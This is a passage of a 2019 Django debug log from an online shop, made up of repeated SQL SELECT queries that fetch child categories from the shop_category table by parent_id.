"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:36:39,208 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:36:39,212 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:36:39,215 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:36:39,217 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:36:39,219 utils 20136 140506432534272 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:36:39,221 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:36:39,222 utils 20136 140506432534272 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:36:39,236 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:36:39,242 utils 20136 140506432534272 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:36:39,246 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:36:39,249 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:36:39,253 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:36:39,258 utils 20136 140506432534272 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:36:39,261 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 07:36:39,264 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:36:39,268 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:36:39,273 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:36:39,278 utils 20136 140506422044416 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:36:39,282 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:36:39,286 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:36:39,290 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:36:39,294 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:36:39,301 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:36:39,305 utils 20136 140506432534272 (0.011) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:36:39,309 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:36:39,312 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:36:39,316 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:36:39,320 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:36:39,326 utils 20136 140506422044416 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:36:39,329 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:36:39,333 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:36:39,337 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:36:39,339 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:36:39,341 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:36:39,343 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:36:39,345 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:36:39,347 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:36:39,349 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:36:39,352 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:36:39,354 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:36:39,354 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:36:39,363 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:36:39,366 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:36:39,368 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:36:39,370 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:36:39,372 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:36:39,374 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:36:39,376 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:36:39,378 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:36:39,380 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:36:39,383 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:36:39,385 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:36:39,387 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:36:39,393 utils 20136 140506432534272 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:36:39,396 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:36:39,399 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:36:39,399 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:36:39,404 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:36:39,408 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:36:39,411 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:36:39,416 utils 20136 140506422044416 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:36:39,420 utils 20136 140506432534272 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:36:39,424 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:36:39,428 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:36:39,431 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:36:39,433 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:36:39,435 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:36:39,437 utils 20136 140506432534272 (0.002) SELECT 